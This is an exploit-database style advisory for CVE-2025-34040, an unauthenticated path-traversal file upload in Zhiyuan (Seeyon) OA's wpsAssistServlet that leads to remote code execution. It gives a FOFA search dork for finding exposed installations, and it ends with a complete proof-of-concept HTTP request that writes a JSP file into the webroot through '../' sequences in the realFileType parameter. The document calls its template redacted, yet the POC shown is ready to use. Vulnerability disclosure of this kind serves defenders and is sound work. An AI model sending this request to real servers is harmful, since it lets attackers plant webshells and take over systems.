# Exploit Title: Zhiyuan OA - arbitrary file upload leading # Google Dork / FOFA: app="致远互联-OA" && title="V8.0SP2" # Date: 1-11-2025 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://service.seeyon.com/ # Software Link: [vendor download / product page if available] # Version: 5.0, 5.1–5.6sp1, 6.0–6.1sp2, 7.0–7.1sp1, 8.0–8.0sp2 (per NVD/VulnCheck) # Tested on: MacOS # CVE: CVE-2025-34040 Description: A path-traversal / improper validation in the multipart file upload handling of Zhiyuan OA's `wpsAssistServlet` allows an unauthenticated actor (or actor able to reach upload endpoint) to place crafted files outside the intended directories by controlling `realFileType` and `fileId` parameters. Under affected configurations, an uploaded JSP can be stored in the webroot and executed, yielding remote code execution. High-level reproduction template (redacted — non-actionable): POST request to `/seeyon/wpsAssistServlet` with multipart/form-data. The `realFileType` parameter is used to resolve the target path; insufficient validation permits `..` sequences leading to writes under webapp root. The uploaded file contents must be controlled to produce a server-side executable file (e.g., JSP) — DO NOT include such server-side code here. Impact: - Remote code execution if the uploaded file is accessible and executable. - Complete server compromise and pivoting to internal networks. - Data exfiltration, persistence, and further lateral movement. References: - NVD CVE-2025-34040 (NVD entry – awaiting enrichment) - VulnCheck advisory: https://vulncheck.com/advisories/zhiyuan-oa-system-path-traversal-file-upload - CNVD entry: https://www.cnvd.org.cn/flaw/show/CNVD-2021-01627 - Vendor patch/notice: https://service.seeyon.com/patchtools/tp.html POC; POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=...... Accept-Encoding: gzip --...... Content-Disposition: form-data; name="upload"; filename="123.xls" Content-Type: application/vnd.ms-excel <% out.println("HelloWorld");%> --.......--